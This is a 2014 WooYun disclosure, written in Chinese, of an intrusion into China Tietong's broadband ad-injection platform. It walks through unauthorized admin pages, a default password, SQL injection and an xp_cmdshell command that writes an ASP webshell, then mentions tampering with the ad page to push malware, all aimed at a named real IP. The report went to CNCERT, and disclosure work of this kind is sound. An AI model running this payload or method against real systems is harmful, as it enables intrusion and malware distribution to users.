当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-067756

漏洞标题:中国铁通宽带广告投放系统存在严重安全问题(可推送挂马)

相关厂商:中国铁通集团有限公司

漏洞作者: Gosuto

提交时间:2014-07-07 19:15

修复时间:2014-08-21 19:16

公开时间:2014-08-21 19:16

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-07: 细节已通知厂商并且等待厂商处理中
2014-07-12: 厂商已经确认,细节仅向厂商公开
2014-07-22: 细节向核心白帽子及相关领域专家公开
2014-08-01: 细节向普通白帽子公开
2014-08-11: 细节向实习白帽子公开
2014-08-21: 细节向公众公开

简要描述:

最近被铁通恶意插入的广告搞的蛋疼 投诉无门 自己搞定

详细说明:

前阶段电脑莫名其妙的随机跳转hao123 一号店等地址 搞的我以为电脑中毒了
最近倒是不跳了 不管登陆什么网站 右下角总弹出一些风格一样的广告
F12看了一下广告图片的地址
http://61.235.249.195:6699/FilesUp/5e1e6923-4205-452d-bc25-6ed0855cb22a.gif
查下IP地址: 61.235.249.195辽宁省沈阳市 铁通
这不我大铁通的IP么 难道被劫持了?
百度之 果然是运营商劫持 顿时我就不开心了 本来前几天学长们毕业心情就不好 你还给我弹广告!
扫描了一下 找到两个后台地址:
http://61.235.249.195:808
http://61.235.249.195:6789

QQ截图20140707175756.png


简单试了一下弱口令 万能密码 无效...好失落...
丢到wwwsacn里 也没扫到什么用处较大的信息
不过根据以前的经验 猜到这类外观比较挫的网站安全性都比较差 就开始试能不能越权
越权漏洞:
http://61.235.249.195:6789/ManageFrame/left.aspx
不行
http://61.235.249.195:6789/ManageFrame/top.aspx
哎呦 这个可以!虽然用处不大...不过 总比啥都没有强!

QQ截图20140707180531.png


下载了帮助文档...发现原来这个系统还可以DNS劫持!

QQ截图20140707180748.png


之后又是一顿瞎猜 不过没什么收货了
不过那个个人设置吸引了我的注意力
http://61.235.249.195:6789/Common/UserManage/UserEditOneself.aspx
估计因为没参数 所以内容都是空白的
不过他的文件命名引起了我的兴趣 尝试修改了一下
http://61.235.249.195:6789/Common/UserManage/UserEdit.aspx
哎呦 路径被爆出来了

QQ截图20140707181319.png


换808那个后台再访问下
http://61.235.249.195:808/Common/UserManage/UserEdit.aspx
页面成功加载出来了

QQ截图20140707181436.png


然后 手欠的点了下取消 人品顿时爆发了
http://61.235.249.195:808/Common/UserManage/UserList.aspx

QQ截图20140707181545.png


这个用户有点少 我们换回6789

QQ截图20140707181658.png


我尝试添加了一个用户 成功了 不过登陆时提示未分配角色
但创建用户时的一句话引起了我的注意

QQ截图20140707181820.png


初始密码为1
越权页面:
http://61.235.249.195:6789/Common/UserManage/UserList.aspx
添加用户
http://61.235.249.195:6789/Common/Common_Role/RoleList.aspx
给予管理权限
密码弱口令:
随便找了个账号 就第一个吧 密码1 哦也 进去了~

QQ截图20140707182000.png


不过这都不是我的目的啊
我需要的是管理账号给自己的账号加白名单啊!然后我想到了注入!
注入点:
突然想到在http://61.235.249.195:6789/Common/UserManage/UserList.aspx
还有搜功能 会不会存在注入呢?来个引号试试!
人品再次爆发!

QQ截图20140707182629.png


然后发现竟然是sa权限 xp_cmdshell还没删除 发完这个漏洞我觉得我应该去买个彩票
路径也有了 直接写shell啊!
直接搜索cttjs';exec master..xp_cmdshell 'echo ^<%eval request(Chr(97))%^>>f:\浙江\IIOSManageWeb_主线08211\Common\UserManage\a.asp';--
写入一句话http://61.235.249.195:808/Common/UserManage/a.asp a

QQ截图20140707183014.png


推送挂马:
入侵期间发现广告的一些管理页面无法访问 做了IP限制?
不过这阻止不了有心的黑客们
翻了一下 找到了广告页面的文件 F:\IIIOS素材\Default.aspx
修改下 加点语句 神不知鬼不觉...

漏洞证明:

QQ截图20140707183142.png


QQ截图20140707183544.png


QQ截图20140707184138.png


QQ截图20140707184258.png


QQ截图20140707184357.png


QQ截图20140707184430.png


QQ截图20140707184442.png

修复方案:

白名单账号求不删!

版权声明:转载请注明来源 Gosuto@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-07-12 12:59

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT直接通报给中国移动集团公司,由其后续下发工单给原铁通单位处置。按运行安全风险评分,rank 15

最新状态:

暂无